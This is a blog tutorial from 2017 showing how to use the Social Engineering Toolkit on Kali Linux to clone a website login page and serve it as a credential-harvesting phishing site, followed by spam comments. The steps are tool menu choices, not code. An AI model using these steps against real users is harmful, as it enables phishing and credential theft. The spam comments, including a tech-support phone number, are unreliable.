Friday, March 10, 2017

Social Engineering Toolkit: Credential Harvesting


Overview
The Social Engineering Toolkit (SET) is specifically designed to perform advanced attacks against the human element.[1]


Requirements
For this blog post I used the Kali Linux operating system which comes with SET pre-installed.



Instructions
Launch SET
  • Applications > Exploitation Tools > Social Engineering ToolKit
A. Loading Credential Harvesting
  1. Select: "1) Social-Engineering Attacks" by typing the number 1
  2. Select: "2) Website Attack Vectors" by typing the number 2
  3. Select: "3) Credential Harvester Attack Method" by typing the number 3
  4. Select: "3) Custom Import"  by typing the number 3


 B. Cloning A Website
  1. Open a browser (Any browser will work)
  2. Navigate to the Website Login page you wish to clone. 
  3. Navigate to the File option in your browser.
  4. Change the Name field to index.html (the name is case sensitive)
  5. Change the Save Location to /var/www/html
  6. Change Type to Web Page, Complete
  7. Save
C. Arming the Website
  1. Open a Terminal and type ifconfig
  2. Copy the inet addr: xxx.xxx.xxx.xxx
  3. Paste the inet addr into the terminal running SET
    • set: webattack > IP address for the POST back in Harvester/Tabnabbing: xxx.xxx.xxx.xxx
  4. Type the following file path:
    • /var/www/html
  5. Type the URL of the website you clone.
  6. Type "y" for yes you want to start Apache server. 
D. Testing the Website
If everything was done correctly you'll see an exact clone of the website you cloned. 
  1. Open a browser (on the same machine you used SET on)
  2. Type in your inet addr: xxx.xxx.xxx.xxx into the URL bar.
  3. Hit Enter key

Reference
1. Social Engineering Toolkit

Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec

8 comments:

  1. Thank you again for all the knowledge you distribute,Good post. I was very interested in the article, it's quite inspiring I should admit. I like visiting you site since I always come across interesting articles like this one.Great Job, I greatly appreciate that.Do Keep sharing! Regards,

    ReplyDelete
  2. Hello everyone, you are looking for online webroot technical support service, And you want to install webroot antivirus, that time you faced any issue then call us on our webroot technical support phone number 1844-443-5444 our webroot tech support engineer will be available for you. visit for more information: http://www.bestantivirusupport.com/webroot-support.html

    ReplyDelete

  3. Thanks for the informative post about fiber optics. The only way we can conveniently and quickly connect these people is through these mediums. Therefore, network security engineer job is very much in demand these days. network security engineers are part of a whole team of people who make this global connectivity possible.

    ReplyDelete
  4. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. Website

    ReplyDelete
  5. Hey, I am so thrilled I found your blog, I am here now and could just like to say thank for a tremendous post and all round interesting website. Please do keep up the great work.

    Actually it includes website very similar United Data Technologies. Its also provide you good information about Cyber security, managed security and etc.

    ReplyDelete
  6. Two of these concentrations are Computer Systems Security and Information Assurance. Some of the core courses you can expect to take are Intro to Computer Science, Security Compliance, and Vulnerability Assessment and Management. cyber security training in hyderabad

    ReplyDelete
  7. A national salary trend report provided on the Indeed site offers impressive data, as well. As of December 22, 2013, median salaries for the job listings for people with CCNA certification are 36 percent higher than the median salary postings for all of the jobs being listed across the nation. CCNA Training in Pune

    ReplyDelete